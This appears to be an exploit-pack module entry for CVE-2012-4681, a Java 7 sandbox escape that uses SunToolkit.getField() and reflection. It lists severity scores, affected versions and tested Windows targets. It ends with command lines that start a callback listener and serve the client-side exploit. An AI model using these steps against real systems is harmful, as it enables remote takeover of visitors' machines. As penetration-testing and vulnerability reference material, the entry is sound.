CVSS2 base score: 10 (High)

| Metric | Value |
|---|---|
| Access Vector | NETWORK |
| Access Complexity | LOW |
| Authentication | NONE |
| Confidentiality Impact | COMPLETE |
| Integrity Impact | COMPLETE |
| Availability Impact | COMPLETE |
| Vector string | AV:N/AC:L/Au:N/C:C/I:C/A:C |

EPSS: 0.975 (High), percentile 100.0%
| Field | Value |
|---|---|
| Name | java_forName_getField |
| CVE | CVE-2012-4681 Exploit Pack |
| Vendor | Sun |

Notes:
There is a method invocation vulnerability using sun.awt.SunToolkit.getField(). This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.
Affected versions
JDK and JRE 7 Update 6 and earlier
Note: this does not work under JRE 6 due to the getField() function not working correctly.
Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6
Needs more testing (likely to work on other targets)
To run from the command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012